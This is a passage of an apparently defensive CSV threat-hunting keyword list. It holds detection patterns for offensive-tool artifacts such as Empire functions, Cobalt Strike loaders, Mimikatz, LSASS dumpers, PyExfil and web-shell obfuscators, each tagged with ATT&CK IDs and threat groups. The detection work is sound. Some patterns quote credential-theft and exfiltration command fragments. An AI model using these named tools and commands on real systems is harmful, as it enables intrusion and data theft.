T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*EmpireProject*",".{0,1000}EmpireProject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. 
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Empire-Sponsors.git*",".{0,1000}Empire\-Sponsors\.git.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire-test-kalirolling*",".{0,1000}empire\-test\-kalirolling.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - 
T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*emptybowl.py*",".{0,1000}emptybowl\.py.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitrary cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*-EmptyPassword-Users.txt*",".{0,1000}\-EmptyPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Emulates a rightclick on the given coordinates*",".{0,1000}Emulates\sa\srightclick\son\sthe\sgiven\scoordinates.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*enable_persistence.py*",".{0,1000}enable_persistence\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Enable_Privilege /Process:* /Privilege:*",".{0,1000}Enable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*EnableAllParentPrivileges.c*",".{0,1000}EnableAllParentPrivileges\.c.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent 
process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*EnableAllParentPrivileges.exe*",".{0,1000}EnableAllParentPrivileges\.exe.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*EnableAllTokenPrivs.exe.log*",".{0,1000}EnableAllTokenPrivs\.exe\.log.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*Enabled_Users1.txt*",".{0,1000}Enabled_Users1\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Enable-DuplicateToken*",".{0,1000}Enable\-DuplicateToken.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*EnableRDesktopImplant*",".{0,1000}EnableRDesktopImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Enable-SeAssignPrimaryTokenPrivilege*",".{0,1000}Enable\-SeAssignPrimaryTokenPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" 
"*encdatavault2john.py*",".{0,1000}encdatavault2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*encfs2john.py*",".{0,1000}encfs2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*encode baseImage.jpg /etc/passwd newImage.jpg*",".{0,1000}encode\sbaseImage\.jpg\s\/etc\/passwd\snewImage\.jpg.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*encode_base64(xor_encrypt(""cmd /c *",".{0,1000}encode_base64\(xor_encrypt\(\""cmd\s\/c\s.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*encode_base64(xor_encrypt(""WScript.Shell""*",".{0,1000}encode_base64\(xor_encrypt\(\""WScript\.Shell\"".{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*encode_payload rc4 *.txt*",".{0,1000}encode_payload\src4\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an 
AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*encode_xor_shellcode(*",".{0,1000}encode_xor_shellcode\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*EncodeGroup/AggressiveProxy*",".{0,1000}EncodeGroup\/AggressiveProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*EncodeGroup/UAC-SilentClean*",".{0,1000}EncodeGroup\/UAC\-SilentClean.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*encodeScriptPolyglot*",".{0,1000}encodeScriptPolyglot.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" 
"*EncodeShellcode(*",".{0,1000}EncodeShellcode\(.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*encrypt.py *.bin -p * -o *.enc*",".{0,1000}encrypt\.py\s.{0,1000}\.bin\s\-p\s.{0,1000}\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*encrypt/encryptFile.go*",".{0,1000}encrypt\/encryptFile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*encrypt/encryptUrl.go*",".{0,1000}encrypt\/encryptUrl\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*Encrypt-Bytes*",".{0,1000}Encrypt\-Bytes.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*encrypted LSASS dump*",".{0,1000}encrypted\sLSASS\sdump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*encrypted_payload*",".{0,1000}encrypted_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*encrypted_sleep(ms:*",".{0,1000}encrypted_sleep\(ms\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*EncryptedPfx.py*",".{0,1000}EncryptedPfx\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*EncryptedZIP.csproj*",".{0,1000}EncryptedZIP\.csproj.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
